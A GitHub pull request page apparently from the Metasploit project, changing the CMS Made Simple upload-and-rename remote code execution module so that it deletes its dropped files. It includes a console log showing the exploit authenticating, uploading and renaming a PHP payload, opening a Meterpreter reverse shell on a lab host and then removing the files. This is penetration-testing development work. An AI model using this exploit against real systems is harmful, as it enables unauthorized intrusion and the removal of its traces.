Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Remove uploaded files from application #10405

Merged
merged 2 commits into from
Aug 1, 2018
Merged

Remove uploaded files from application #10405

merged 2 commits into from
Aug 1, 2018

Conversation

jrobles-r7
Copy link
Contributor

@jrobles-r7 jrobles-r7 commented Jul 31, 2018
edited by acammack-r7
Loading

Update to exploit/multi/http/cmsms_upload_rename_rce module.
Delete files placed on disk.

  • Check the box
msf5 exploit(multi/http/cmsms_upload_rename_rce) > run 

[*] Started reverse TCP handler on 172.22.222.121:4444 
[*] 172.22.222.175:80 - CMS Made Simple Version: 2.2.5
[+] 172.22.222.175:80 - Authentication successful
[+] 172.22.222.175:80 - File uploaded qbkfunKE.txt
[+] 172.22.222.175:80 - File renamed qbkfunKE.php
[*] Sending stage (37775 bytes) to 172.22.222.175
[*] Meterpreter session 1 opened (172.22.222.121:4444 -> 172.22.222.175:49754) at 2018-07-31 09:50:00 -0500
[+] Deleted qbkfunKE.txt
[+] Deleted qbkfunKE.php

meterpreter > sysinfo
Computer    : MSEDGEWIN10
OS          : Windows NT MSEDGEWIN10 10.0 build 17134 (Windows 10) AMD64
Meterpreter : php/windows
meterpreter >

@wvu wvu requested a review from wchen-r7 July 31, 2018 17:01
@acammack-r7 acammack-r7 merged commit 6c11d58 into rapid7:master Aug 1, 2018
acammack-r7 added a commit that referenced this pull request Aug 1, 2018
@acammack-r7
Land #10405, Cleanup dropped files for CMSMS
41fdb75
@acammack-r7
Copy link
Contributor

acammack-r7 commented Aug 1, 2018
edited by tdoan-r7
Loading

Release Notes

Dropped files are now cleaned up for exploit/multi/http/cmsms_upload_rename_rce.

msjenkins-r7 pushed a commit that referenced this pull request Aug 1, 2018
@acammack-r7 @msjenkins-r7
Land #10405, Cleanup dropped files for CMSMS
43f1f8e
@acammack-r7 acammack-r7 self-assigned this Aug 1, 2018
@jrobles-r7 jrobles-r7 deleted the cmsms-remove-files branch August 13, 2018 10:52
@tdoan-r7 tdoan-r7 added the rn-fix release notes fix label Aug 15, 2018
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@wchen-r7 wchen-r7 Awaiting requested review from wchen-r7

Assignees

@acammack-r7 acammack-r7

Labels
bug module rn-fix release notes fix
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@jrobles-r7 @acammack-r7 @tdoan-r7